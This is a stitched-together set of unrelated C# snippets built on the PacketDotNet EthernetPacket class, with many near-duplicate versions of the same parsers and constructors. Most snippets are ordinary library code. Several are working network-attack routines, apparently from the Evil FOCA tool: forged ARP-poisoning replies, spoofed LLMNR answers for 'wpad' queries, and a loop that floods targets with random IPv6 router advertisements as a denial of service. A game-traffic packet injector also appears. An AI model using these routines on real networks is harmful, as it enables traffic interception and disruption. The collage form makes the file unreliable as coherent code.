private static void PostDashEvent(EthernetPacket packet) { if (((ARPPacket)packet.PayloadPacket).SenderProtocolAddress.ToString() != "0.0.0.0") return; var macAddress = packet.SourceHwAddress.ToString(); var button = ConfigurationManager.AppSettings.AllKeys.SingleOrDefault(m => m.Contains(macAddress)); if (button == null) return; var client = new HttpClient(); var values = new Dictionary<string, string> { {"Event", ConfigurationManager.AppSettings[button] }, {"MacAddress", macAddress }, {"CreatedOn", DateTime.Now.ToString() } }; var data = new FormUrlEncodedContent(values); client.PostAsync("http://localhost:56719/your/api/url/here", data).ContinueWith(task => { client.Dispose(); }); }
/// <summary> /// Generate LLDP packet for adapter /// </summary> /// <param name="adapter"></param> private Packet CreateLLDPPacket(NetworkInterface adapter, PacketInfo pinfo) { Debug.IndentLevel = 2; PhysicalAddress MACAddress = adapter.GetPhysicalAddress(); IPInterfaceProperties ipProperties = adapter.GetIPProperties(); IPv4InterfaceProperties ipv4Properties = null; // Ipv4 IPv6InterfaceProperties ipv6Properties = null;// Ipv6 // IPv6 if (adapter.Supports(NetworkInterfaceComponent.IPv6)) { try { ipv6Properties = ipProperties.GetIPv6Properties(); } catch (NetworkInformationException e) { // Adapter doesn't probably have IPv6 enabled Debug.WriteLine(e.Message, EventLogEntryType.Warning); } } // IPv4 if (adapter.Supports(NetworkInterfaceComponent.IPv4)) { try { ipv4Properties = ipProperties.GetIPv4Properties(); } catch (NetworkInformationException e) { // Adapter doesn't probably have IPv4 enabled Debug.WriteLine(e.Message, EventLogEntryType.Warning); } } // System description Dictionary<string, string> systemDescription = new Dictionary<string, string>(); systemDescription.Add("OS", pinfo.OperatingSystem); systemDescription.Add("Ver", pinfo.OperatingSystemVersion); systemDescription.Add("User", pinfo.Username); systemDescription.Add("Uptime", pinfo.Uptime); // Port description Dictionary<string, string> portDescription = new Dictionary<string, string>(); // adapter.Description is for example "Intel(R) 82579V Gigabit Network Connection" // Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\<number>\Description value portDescription.Add("Vendor", adapter.Description); /* adapter.Id is GUID and can be found in several places: In this example it is "{87423023-7191-4C03-A049-B8E7DBB36DA4}" Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - \NetworkCards\<number>\ServiceName value (in same tree as adapter.Description!) - \NetworkList\Nla\Cache\Intranet\<adapter.Id> key - \NetworkList\Nla\Cache\Intranet\<domain>\<adapter.Id> key Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion - \NetworkCards\<number>\ServiceName value Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007 {4D36E972-E325-11CE-BFC1-08002BE10318} == Network and Sharing Center -> viewing adapter's "Properties" and selecting "Device class GUID" from dropdown menu {4D36E972-E325-11CE-BFC1-08002BE10318}\0007 == Network and Sharing Center -> viewing adapter's "Properties" and selecting "Driver key" from dropdown menu - \NetCfgInstanceId value - \Linkage\Export value (part of) - \Linkage\FilterList value (part of) - \Linkage\RootDevice value Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_1503&SUBSYS_849C1043&REV_06#3&11583659&0&C8#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{87423023-7191-4C03-A049-B8E7DBB36DA4}\SymbolicLink value (part of) Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Network\{ 4D36E972 - E325 - 11CE - BFC1 - 08002BE10318}\{ 87423023 - 7191 - 4C03 - A049 - B8E7DBB36DA4} Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{ACB3F7A0-2E45-4435-854A-A4E120477E1D}\Connection\Name value (part of) Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\{ 87423023 - 7191 - 4C03 - A049 - B8E7DBB36DA4} Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\iphlpsvc\Parameters\Isatap\{ ACB3F7A0 - 2E45 - 4435 - 854A - A4E120477E1D}\InterfaceName value (part of) Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\<various names>\Linkage - \Bind value (part of) - \Export value (part of) - \Route value (part of) Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces\Tcpip_{87423023-7191-4C03-A049-B8E7DBB36DA4} Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Psched\Parameters\NdisAdapters\{87423023-7191-4C03-A049-B8E7DBB36DA4} Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RemoteAccess\Interfaces\<number>\InterfaceName value Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Adapters\{87423023-7191-4C03-A049-B8E7DBB36DA4}\IpConfig value (part of) IPv4 information: Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{87423023-7191-4C03-A049-B8E7DBB36DA4} IPv6 information: Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPIP6\Parameters\Interfaces\{87423023-7191-4c03-a049-b8e7dbb36da4} Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WfpLwf\Parameters\NdisAdapters\{87423023-7191-4C03-A049-B8E7DBB36DA4} */ portDescription.Add("ID", adapter.Id); // Gateway if (ipProperties.GatewayAddresses.Count > 0) { portDescription.Add("GW", String.Join(", ", ipProperties.GatewayAddresses.Select(i => i.Address.ToString()).ToArray())); } else { portDescription.Add("GW", "-"); } // CIDR if (ipProperties.UnicastAddresses.Count > 0) { int[] mask = ipProperties.UnicastAddresses .Where( w => w.IPv4Mask.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork ) .Select(x => getCIDRFromIPMaskAddress(x.IPv4Mask)) .ToArray() ; portDescription.Add("CIDR", String.Join(", ", mask)); } else { portDescription.Add("CIDR", "-"); } // DNS server(s) if (ipProperties.DnsAddresses.Count > 0) { portDescription.Add("DNS", String.Join(", ", ipProperties.DnsAddresses.Select(i => i.ToString()).ToArray())); } else { portDescription.Add("DNS", "-"); } // DHCP server if (ipProperties.DhcpServerAddresses.Count > 0) { portDescription.Add("DHCP", String.Join(", ", ipProperties.DhcpServerAddresses.Select(i => i.ToString()).ToArray())); } else { portDescription.Add("DHCP", "-"); } // WINS server(s) if (ipProperties.WinsServersAddresses.Count > 0) { portDescription.Add("WINS", String.Join(", ", ipProperties.WinsServersAddresses.Select(i => i.ToString()).ToArray())); } // Link speed portDescription.Add("Speed", ReadableSize(adapter.Speed) + "ps"); // Capabilities enabled List<CapabilityOptions> capabilitiesEnabled = new List<CapabilityOptions>(); capabilitiesEnabled.Add(CapabilityOptions.StationOnly); if (ipv4Properties.IsForwardingEnabled) { capabilitiesEnabled.Add(CapabilityOptions.Router); } ushort expectedSystemCapabilitiesCapability = GetCapabilityOptionsBits(GetCapabilityOptions()); ushort expectedSystemCapabilitiesEnabled = GetCapabilityOptionsBits(capabilitiesEnabled); // Constuct LLDP packet LLDPPacket lldpPacket = new LLDPPacket(); lldpPacket.TlvCollection.Add(new ChassisID(ChassisSubTypes.MACAddress, MACAddress)); lldpPacket.TlvCollection.Add(new PortID(PortSubTypes.LocallyAssigned, System.Text.Encoding.UTF8.GetBytes(adapter.Name))); lldpPacket.TlvCollection.Add(new TimeToLive(120)); lldpPacket.TlvCollection.Add(new PortDescription(CreateTlvString(portDescription))); lldpPacket.TlvCollection.Add(new SystemName(Environment.MachineName)); lldpPacket.TlvCollection.Add(new SystemDescription(CreateTlvString(systemDescription))); lldpPacket.TlvCollection.Add(new SystemCapabilities(expectedSystemCapabilitiesCapability, expectedSystemCapabilitiesEnabled)); // Management var managementAddressObjectIdentifier = "Management"; // Add management IPv4 address(es) if (null != ipv4Properties) { foreach (UnicastIPAddressInformation ip in ipProperties.UnicastAddresses) { if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork) { lldpPacket.TlvCollection.Add(new ManagementAddress(new NetworkAddress(ip.Address), InterfaceNumbering.SystemPortNumber, Convert.ToUInt32(ipv4Properties.Index), managementAddressObjectIdentifier)); } } } // Add management IPv6 address(es) if (null != ipv6Properties) { foreach (UnicastIPAddressInformation ip in ipProperties.UnicastAddresses) { if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetworkV6) { lldpPacket.TlvCollection.Add(new ManagementAddress(new NetworkAddress(ip.Address), InterfaceNumbering.SystemPortNumber, Convert.ToUInt32(ipv6Properties.Index), managementAddressObjectIdentifier)); } } } // == Organization specific TLVs // Ethernet lldpPacket.TlvCollection.Add(new OrganizationSpecific(new byte[] { 0x0, 0x12, 0x0f }, 5, new byte[] { 0x5 })); var expectedOrganizationUniqueIdentifier = new byte[3] { 0, 0, 0 }; var expectedOrganizationSpecificBytes = new byte[] { 0, 0, 0, 0 }; //int orgSubType = 0; // IPv4 Information: //if (null != ipv4Properties) //{ // lldpPacket.TlvCollection.Add((new StringTLV(TLVTypes.OrganizationSpecific, String.Format("IPv4 DHCP: {0}", ipv4Properties.IsDhcpEnabled.ToString())))); //lldpPacket.TlvCollection.Add(new OrganizationSpecific(expectedOrganizationSpecificBytes, new StringTLV(), System.Text.Encoding.UTF8.GetBytes(String.Format("IPv4 DHCP: {0}", ipv4Properties.IsDhcpEnabled.ToString())))); //} // End of LLDP packet lldpPacket.TlvCollection.Add(new EndOfLLDPDU()); if (0 == lldpPacket.TlvCollection.Count) { throw new Exception("Couldn't construct LLDP TLVs."); } if (lldpPacket.TlvCollection.Last().GetType() != typeof(EndOfLLDPDU)) { throw new Exception("Last TLV must be type of 'EndOfLLDPDU'!"); } foreach (TLV tlv in lldpPacket.TlvCollection) { Debug.WriteLine(tlv.ToString(), EventLogEntryType.Information); } // Generate packet Packet packet = new EthernetPacket(MACAddress, destinationHW, EthernetPacketType.LLDP); packet.PayloadData = lldpPacket.Bytes; return packet; }
public void BinarySerialization() { var dev = new CaptureFileReaderDevice("../../CaptureFiles/tcp.pcap"); dev.Open(); RawCapture rawCapture; bool foundEthernet = false; while ((rawCapture = dev.GetNextPacket()) != null) { var ethernetPacket = new EthernetPacket(new ByteArraySegment(rawCapture.Data)); if (ethernetPacket == null) { continue; } foundEthernet = true; var memoryStream = new MemoryStream(); BinaryFormatter serializer = new BinaryFormatter(); serializer.Serialize(memoryStream, ethernetPacket); memoryStream.Seek (0, SeekOrigin.Begin); BinaryFormatter deserializer = new BinaryFormatter(); EthernetPacket fromFile = (EthernetPacket)deserializer.Deserialize(memoryStream); Assert.AreEqual(ethernetPacket.Bytes, fromFile.Bytes); Assert.AreEqual(ethernetPacket.BytesHighPerformance.Bytes, fromFile.BytesHighPerformance.Bytes); Assert.AreEqual(ethernetPacket.BytesHighPerformance.BytesLength, fromFile.BytesHighPerformance.BytesLength); Assert.AreEqual(ethernetPacket.BytesHighPerformance.Length, fromFile.BytesHighPerformance.Length); Assert.AreEqual(ethernetPacket.BytesHighPerformance.NeedsCopyForActualBytes, fromFile.BytesHighPerformance.NeedsCopyForActualBytes); Assert.AreEqual(ethernetPacket.BytesHighPerformance.Offset, fromFile.BytesHighPerformance.Offset); Assert.AreEqual(ethernetPacket.Color, fromFile.Color); Assert.AreEqual(ethernetPacket.DestinationHwAddress, fromFile.DestinationHwAddress); Assert.AreEqual(ethernetPacket.Header, fromFile.Header); Assert.AreEqual(ethernetPacket.ParentPacket, fromFile.ParentPacket); Assert.AreEqual(ethernetPacket.PayloadData, fromFile.PayloadData); Assert.AreEqual(ethernetPacket.SourceHwAddress, fromFile.SourceHwAddress); Assert.AreEqual(ethernetPacket.Type, fromFile.Type); } dev.Close(); Assert.IsTrue(foundEthernet, "Capture file contained no Ethernet packets"); }
/// <summary> /// Parse bytes into a packet /// </summary> /// <param name="LinkLayer"> /// A <see cref="LinkLayers"/> /// </param> /// <param name="PacketData"> /// A <see cref="System.Byte"/> /// </param> /// <returns> /// A <see cref="Packet"/> /// </returns> public static Packet ParsePacket(LinkLayers LinkLayer, byte[] PacketData) { Packet p; var bas = new ByteArraySegment(PacketData); switch (LinkLayer) { case LinkLayers.Ethernet: p = new EthernetPacket(bas); break; case LinkLayers.LinuxSLL: p = new LinuxSLLPacket(bas); break; case LinkLayers.Ppp: p = new PPPPacket(bas); break; case LinkLayers.Ieee80211: p = new Ieee80211MacFrame(bas); break; case LinkLayers.Ieee80211_Radio: p = new Ieee80211RadioPacket(bas); break; default: throw new System.NotImplementedException("LinkLayer of " + LinkLayer + " is not implemented"); } return(p); }
public static void Main(string[] args) { ushort tcpSourcePort = 123; ushort tcpDestinationPort = 321; var tcpPacket = new TcpPacket(tcpSourcePort, tcpDestinationPort); var ipSourceAddress = System.Net.IPAddress.Parse("192.168.1.1"); var ipDestinationAddress = System.Net.IPAddress.Parse("192.168.1.2"); var ipPacket = new IPv4Packet(ipSourceAddress, ipDestinationAddress); var sourceHwAddress = "90-90-90-90-90-90"; var ethernetSourceHwAddress = System.Net.NetworkInformation.PhysicalAddress.Parse(sourceHwAddress); var destinationHwAddress = "80-80-80-80-80-80"; var ethernetDestinationHwAddress = System.Net.NetworkInformation.PhysicalAddress.Parse(destinationHwAddress); // NOTE: using EthernetPacketType.None to illustrate that the ethernet // protocol type is updated based on the packet payload that is // assigned to that particular ethernet packet var ethernetPacket = new EthernetPacket(ethernetSourceHwAddress, ethernetDestinationHwAddress, EthernetPacketType.None); // Now stitch all of the packets together ipPacket.PayloadPacket = tcpPacket; ethernetPacket.PayloadPacket = ipPacket; // and print out the packet to see that it looks just like we wanted it to Console.WriteLine(ethernetPacket.ToString()); }
/// <summary> /// Returns the embedded Wake-On-LAN packet /// or null if there is none /// </summary> /// <returns> /// A Wake-On-LAN packet /// </returns> public static WakeOnLanPacket GetEncapsulated(Packet p) { if (p is EthernetPacket) { var payload = EthernetPacket.GetInnerPayload((InternetLinkLayerPacket)p); if (((EthernetPacket)p).Type == EthernetPacketType.WakeOnLan) { var payloadBas = new ByteArraySegment(p.PayloadData); if (WakeOnLanPacket.IsValid(payloadBas)) { return(new WakeOnLanPacket(payloadBas)); } } if (payload != null && payload is IpPacket) { var innerPayload = payload.PayloadPacket; if ((innerPayload != null) && (innerPayload.PayloadData != null) && (innerPayload is UdpPacket)) { var innerPayloadBas = new ByteArraySegment(innerPayload.PayloadData); if (WakeOnLanPacket.IsValid(innerPayloadBas)) { return(new WakeOnLanPacket(innerPayloadBas)); } } } } return(null); }
public void SendSupplyBoxOpen() { byte[] packet = new byte[] { 0x69, 0x04, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0xEC, 0x04, 0x8B, 0x11, 0x17, 0x00, 0x00, 0x00, 0xEC, 0x04, 0x00, 0x1F, 0xF7, 0x51, 0x8D, 0x0A, 0x00, 0x61, 0x00, 0x73, 0x00, 0x64, 0x00, 0x66, 0x00, 0x00, 0x00 }; packet[4] = (byte)((int)(packet[4] + 10)); Gunz2Packet.Encrypt(packet, 12, (uint)packet.Length - 12, _cryptKey); var checksum = Gunz2Packet.CalculateChecksum(packet, packet.Length); Buffer.BlockCopy(BitConverter.GetBytes(checksum), 0, packet, 10, 2); var tcp = new TcpPacket(_srcPort, 20100); var ip = new IPv4Packet(_srcIP, _destIP); var ether = new EthernetPacket(_srcPhsyical, _destPhysical, EthernetPacketType.None); tcp.Ack = true; tcp.Psh = true; tcp.PayloadData = packet; ip.PayloadPacket = tcp; ether.PayloadPacket = ip; Console.WriteLine(ether); _device.SendPacket(ether); }
/// <summary> /// Constructor /// </summary> /// <param name="bas">A <see cref="ByteArraySegment" /></param> /// <param name="parentPacket">The parent packet.</param> public GREPacket(ByteArraySegment bas, Packet parentPacket) { // slice off the header portion // ReSharper disable once UseObjectOrCollectionInitializer Header = new ByteArraySegment(bas); Header.Length = GREFields.FlagsLength + GREFields.ProtocolLength; if (HasCheckSum) { Header.Length += GREFields.ChecksumLength; } if (HasReserved) { Header.Length += GREFields.ReservedLength; } if (HasKey) { Header.Length += GREFields.KeyLength; } if (HasSequence) { Header.Length += GREFields.SequenceLength; } // parse the encapsulated bytes PayloadPacketOrData = new Lazy <PacketOrByteArraySegment>(() => EthernetPacket.ParseEncapsulatedBytes(Header, Protocol)); ParentPacket = parentPacket; }
/// <summary> /// Constructor /// </summary> /// <param name="bas"> /// A <see cref="ByteArraySegment"/> /// </param> public GREPacket(ByteArraySegment bas, Packet ParentPacket) { // slice off the header portion header = new ByteArraySegment(bas); header.Length = GREFields.FlagsLength + GREFields.ProtocolLength; if (HasCheckSum) { header.Length += GREFields.ChecksumLength; } if (HasReserved) { header.Length += GREFields.ReservedLength; } if (HasKey) { header.Length += GREFields.KeyLength; } if (HasSequence) { header.Length += GREFields.SequenceLength; } // parse the encapsulated bytes payloadPacketOrData = EthernetPacket.ParseEncapsulatedBytes(header, Protocol); this.ParentPacket = ParentPacket; }
/// <summary> /// Constructor /// </summary> /// <param name="bas"> /// A <see cref="ByteArraySegment" /> /// </param> public LinuxSLLPacket(ByteArraySegment bas) { this.header = new ByteArraySegment(bas); this.header.Length = LinuxSLLFields.SLLHeaderLength; // parse the payload via an EthernetPacket method this.payloadPacketOrData = EthernetPacket.ParseEncapsulatedBytes(this.header, this.EthernetProtocolType); }
/// <summary> /// Constructor /// </summary> /// <param name="bas"> /// A <see cref="ByteArraySegment" /> /// </param> public LinuxSLLPacket(ByteArraySegment bas) { Header = new ByteArraySegment(bas); Header.Length = LinuxSLLFields.SLLHeaderLength; // parse the payload via an EthernetPacket method PayloadPacketOrData = new Lazy <PacketOrByteArraySegment>(() => EthernetPacket.ParseEncapsulatedBytes(Header, EthernetProtocolType)); }
/// <summary> /// Constructor /// </summary> /// <param name="bas"> /// A <see cref="ByteArraySegment" /> /// </param> public Ieee8021QPacket(ByteArraySegment bas) { // set the header field, header field values are retrieved from this byte array this.header = new ByteArraySegment(bas); this.header.Length = Ieee8021QFields.HeaderLength; // parse the payload via an EthernetPacket method this.payloadPacketOrData = EthernetPacket.ParseEncapsulatedBytes(this.header, this.Type); }
public static EthernetPacket CreateEthernetPacket(PhysicalAddress sourceAddress, PhysicalAddress destinationAddress, Packet payloapPacket) { var result = new EthernetPacket(sourceAddress, destinationAddress, EthernetPacketType.IpV4) { PayloadPacket = payloapPacket }; return result; }
/// <summary> /// Constructor /// </summary> /// <param name="bas"> /// A <see cref="ByteArraySegment" /> /// </param> public Ieee8021QPacket(ByteArraySegment bas) { // set the header field, header field values are retrieved from this byte array Header = new ByteArraySegment(bas); Header.Length = Ieee8021QFields.HeaderLength; // parse the payload via an EthernetPacket method PayloadPacketOrData = new Lazy <PacketOrByteArraySegment>(() => EthernetPacket.ParseEncapsulatedBytes(Header, Type), LazyThreadSafetyMode.PublicationOnly); }
/// <summary> /// Constructor /// </summary> /// <param name="bas"> /// A <see cref="ByteArraySegment"/> /// </param> public Ieee8021QPacket(ByteArraySegment bas) { // set the header field, header field values are retrieved from this byte array header = new ByteArraySegment(bas); RandomUtils.EnsurePacketLength(this, Ieee8021QFields.HeaderLength, header.Length); header.Length = Ieee8021QFields.HeaderLength; // parse the payload via an EthernetPacket method payloadPacketOrData = EthernetPacket.ParseEncapsulatedBytes(header, Type); }
public PacketWrapper(uint id, IPv4Packet ipv4, ushort sourcePort, ushort destPort, ConanPacket conanPacket) { Id = id; ConanPacket = conanPacket; EthernetPacket = new EthernetPacket(NullAddress, NullAddress, EthernetPacketType.IpV4) { PayloadPacket = ipv4 }; Ipv4Packet.PayloadPacket = new UdpPacket(sourcePort, destPort); // conandata }
/// <summary> /// Constructor /// </summary> /// <param name="byteArraySegment"> /// A <see cref="ByteArraySegment" /> /// </param> public LinuxSllPacket(ByteArraySegment byteArraySegment) { Header = new ByteArraySegment(byteArraySegment) { Length = LinuxSllFields.SLLHeaderLength }; // parse the payload via an EthernetPacket method PayloadPacketOrData = new LazySlim <PacketOrByteArraySegment>(() => EthernetPacket.ParseNextSegment(Header, EthernetProtocolType)); }
public static EthernetPacket GenerateResponseArpPoison(PhysicalAddress localMac, PhysicalAddress mac1, IPAddress ip1, IPAddress ip2) { EthernetPacket ethernet; ethernet = new EthernetPacket(localMac, mac1, EthernetPacketType.Arp); ethernet.PayloadPacket = new ARPPacket(ARPOperation.Response, mac1, ip1, localMac, ip2); return ethernet; }
/// <summary> /// Constructor /// </summary> /// <param name="byteArraySegment"> /// A <see cref="ByteArraySegment" /> /// </param> public LinuxSllPacket(ByteArraySegment byteArraySegment) { Header = new ByteArraySegment(byteArraySegment) { Length = LinuxSllFields.SLLHeaderLength }; // parse the payload via an EthernetPacket method PayloadPacketOrData = new Lazy <PacketOrByteArraySegment>(() => EthernetPacket.ParseNextSegment(Header, EthernetProtocolType), LazyThreadSafetyMode.PublicationOnly); }
/// <summary> /// Constructor /// </summary> /// <param name="byteArraySegment"> /// A <see cref="ByteArraySegment" /> /// </param> public Ieee8021QPacket(ByteArraySegment byteArraySegment) { // set the header field, header field values are retrieved from this byte array Header = new ByteArraySegment(byteArraySegment) { Length = Ieee8021QFields.HeaderLength }; // parse the payload via an EthernetPacket method PayloadPacketOrData = new LazySlim <PacketOrByteArraySegment>(() => EthernetPacket.ParseNextSegment(Header, Type)); }
public void device_OnPacketArrival(object sender, CaptureEventArgs eCap) { try { ByteArraySegment raw = new ByteArraySegment(eCap.Packet.Data); EthernetPacket ethernetPacket = new EthernetPacket(raw); IpPacket ipPacket = (IpPacket)ethernetPacket.PayloadPacket; TcpPacket tcp = (TcpPacket)ipPacket.PayloadPacket; if (ipPacket != null && tcp != null) { string destIp = ipPacket.DestinationAddress.ToString(); if (destIp == captureIp) { //Client -> Server MainWindow.pp.AppendClientData(tcp.PayloadData); // ReSharper disable CSharpWarnings::CS0642 while (MainWindow.pp.ProcessClientData()) ; // ReSharper restore CSharpWarnings::CS0642 } else { //Do a check for a new game Connection. Each handshake starts with a dword 1 packet from the server. byte[] test = { 0x01, 0x00, 0x00, 0x00 }; if (StructuralComparisons.StructuralEqualityComparer.Equals(test, tcp.PayloadData)) { //New Connection detected. //We should reset State and Security Info MainWindow.pp.Init(); MainWindow.pp.State = 0; MainWindow.ClearPackets(); } //Sever -> Client MainWindow.pp.AppendServerData(tcp.PayloadData); // ReSharper disable CSharpWarnings::CS0642 while (MainWindow.pp.ProcessServerData()) ; // ReSharper restore CSharpWarnings::CS0642 } } } catch (Exception ex) { MainWindow.SetText("device_OnPacketArrival failure. \n Message:" + ex); } }
public void TestOptimalByteRetrieval() { var ethernetPacket = BuildNonContiguousEthernetPacket(); // now extract a contiguous series of bytes var contiguousBytes = ethernetPacket.Bytes; // and re-parse the packet var contiguousEthernetPacket = new EthernetPacket(new PacketDotNet.Utils.ByteArraySegment(contiguousBytes)); // used to make sure we get the same byte[] reference returned each time // because thats what we expect byte[] theByteArray = null; // store the logging value var oldThreshold = LoggingConfiguration.GlobalLoggingLevel; // disable logging to improve performance LoggingConfiguration.GlobalLoggingLevel = log4net.Core.Level.Off; // now benchmark retrieving the byte[] for several seconds var startTime = DateTime.Now; var endTime = startTime.Add(new TimeSpan(0, 0, 2)); int testRuns = 0; while(DateTime.Now < endTime) { var theBytes = contiguousEthernetPacket.Bytes; // make sure that we always get back the same reference // for the byte[] if(theByteArray == null) { theByteArray = theBytes; } else { Assert.AreSame(theByteArray, theBytes); } testRuns++; } // update the actual end of the loop endTime = DateTime.Now; // restore logging LoggingConfiguration.GlobalLoggingLevel = oldThreshold; var rate = new Rate(startTime, endTime, testRuns, "Test runs"); Console.WriteLine(rate.ToString()); }
/// <summary> /// Parse bytes into a packet /// </summary> /// <param name="LinkLayer"> /// A <see cref="LinkLayers"/> /// </param> /// <param name="PacketData"> /// A <see cref="System.Byte"/> /// </param> /// <returns> /// A <see cref="Packet"/> /// </returns> public static Packet ParsePacket(LinkLayers LinkLayer, byte[] PacketData) { Packet p; var bas = new ByteArraySegment(PacketData); log.DebugFormat("LinkLayer {0}", LinkLayer); switch (LinkLayer) { case LinkLayers.Ethernet: p = new EthernetPacket(bas); break; case LinkLayers.LinuxSLL: p = new LinuxSLLPacket(bas); break; case LinkLayers.Null: p = new NullPacket(bas); break; case LinkLayers.Ppp: p = new PPPPacket(bas); break; case LinkLayers.Ieee80211: p = Ieee80211.MacFrame.ParsePacket(bas); break; case LinkLayers.Ieee80211_Radio: p = new Ieee80211.RadioPacket(bas); break; case LinkLayers.PerPacketInformation: p = new Ieee80211.PpiPacket(bas); break; case LinkLayers.Raw: p = new RawIPPacket(bas); break; default: throw new System.NotImplementedException("LinkLayer of " + LinkLayer + " is not implemented"); } return(p); }
public void GenerateLLMNRResponse(Packet packet) { try { LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket(); llmnr.ParsePacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData); if (llmnr.Query.Name.ToLower().Equals("wpad") && llmnr.Query.Type.Value == LLMNR.DNSType.A) { WinPcapDevice dev = Program.CurrentProject.data.GetDevice(); IPAddress ip = Program.CurrentProject.data.GetIPv4FromDevice(dev); byte[] ipv4Addr = ip.GetAddressBytes(); llmnr.AnswerList.Add(new LLMNR.DNSAnswer() { Class = evilfoca.LLMNR.DNSClass.IN, Name = llmnr.Query.Name, Type = evilfoca.LLMNR.DNSType.A, RData = ipv4Addr, RDLength = (short)ipv4Addr.Length, TTL = 12 }); llmnr.IsResponse = true; EthernetPacket ethDns = new EthernetPacket(dev.MacAddress, ((EthernetPacket)packet).SourceHwAddress, EthernetPacketType.IpV4); IPv4Packet ipv4Dns = new IPv4Packet(ip, ((IPv4Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort, ((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort); udpDns.PayloadData = llmnr.BuildPacket(); ipv4Dns.PayloadPacket = udpDns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv4Dns.UpdateIPChecksum(); ipv4Dns.UpdateCalculatedValues(); ethDns.PayloadPacket = ipv4Dns; Program.CurrentProject.data.SendPacket(ethDns); } } catch (Exception) { } }
/// <summary> /// Parse bytes into a packet /// </summary> /// <param name="linkLayer"> /// A <see cref="LinkLayers" /> /// </param> /// <param name="packetData"> /// A <see cref="System.Byte" /> /// </param> /// <returns> /// A <see cref="Packet" /> /// </returns> public static Packet ParsePacket(LinkLayers linkLayer, byte[] packetData) { Packet p; var bas = new ByteArraySegment(packetData); Log.DebugFormat("LinkLayer {0}", linkLayer); switch (linkLayer) { case LinkLayers.Ethernet: p = new EthernetPacket(bas); break; case LinkLayers.LinuxSLL: p = new LinuxSLLPacket(bas); break; case LinkLayers.Ppp: p = new PPPPacket(bas); break; case LinkLayers.Ieee80211: p = MacFrame.ParsePacket(bas); break; case LinkLayers.Ieee80211_Radio: p = new RadioPacket(bas); break; case LinkLayers.PerPacketInformation: p = new PpiPacket(bas); break; //http://sourceforge.net/p/packetnet/patches/1/ case LinkLayers.Raw: var ipVer = (packetData[0] & 0xf0) >> 4; p = (ipVer == 4)? new IPv4Packet(bas) : new IPv6Packet(bas) as Packet; break; default: throw new NotImplementedException("LinkLayer of " + linkLayer + " is not implemented"); } return(p); }
private void Attack() { while (true) { try { foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.DoSSLAAC && A.attackStatus == Data.AttackStatus.Attacking)) { if (attack is evilfoca.Data.DoSSLAACAttack) { for (int i = 0; i < NumberOfRouterAdvertisement; i++) { //MAC del equipo atacado PhysicalAddress MACdst = (attack as evilfoca.Data.DoSSLAACAttack).t1.mac; //IP de origen aleatoria pero siempre de vinculo local IPAddress IPsrc = GetRandomLocalIPv6(); //IP atacada IPAddress IPdst = (attack as evilfoca.Data.DoSSLAACAttack).t1.ip; ICMPv6Packet routerAdvertisement = new ICMPv6Packet(new ByteArraySegment(new ICMPv6.NeighborRouterAdvertisement(MACsrc, GetRandomPrefix(), true).GetBytes())); IPv6Packet ipv6 = new IPv6Packet(IPsrc, IPdst); ipv6.PayloadPacket = routerAdvertisement; ipv6.HopLimit = 255; EthernetPacket ethernet = new EthernetPacket(MACsrc, MACdst, EthernetPacketType.IpV6); ethernet.PayloadPacket = ipv6; Program.CurrentProject.data.SendPacket(ethernet); } } } Thread.Sleep(SendDoSAttackEachXSecs * 1000); } catch (ThreadAbortException) { return; } catch { } } }
private void device_OnPacketArrival(object sender, CaptureEventArgs e) { if (e.Device.LinkType != LinkLayers.Ethernet) return; var ethernetPacket = new EthernetPacket(new ByteArraySegment(e.Packet.Data)); var ipPacket = ethernetPacket.PayloadPacket as IpPacket; if (ipPacket == null) return; OnPacketReceived(ipPacket); var device = (WinPcapDevice) sender; if (device.Statistics.DroppedPackets == _droppedPackets && device.Statistics.InterfaceDroppedPackets == _interfaceDroppedPackets) return; _droppedPackets = device.Statistics.DroppedPackets; _interfaceDroppedPackets = device.Statistics.InterfaceDroppedPackets; File.AppendAllText("TCP", $"DroppedPackets {device.Statistics.DroppedPackets}, InterfaceDroppedPackets {device.Statistics.InterfaceDroppedPackets}"); }
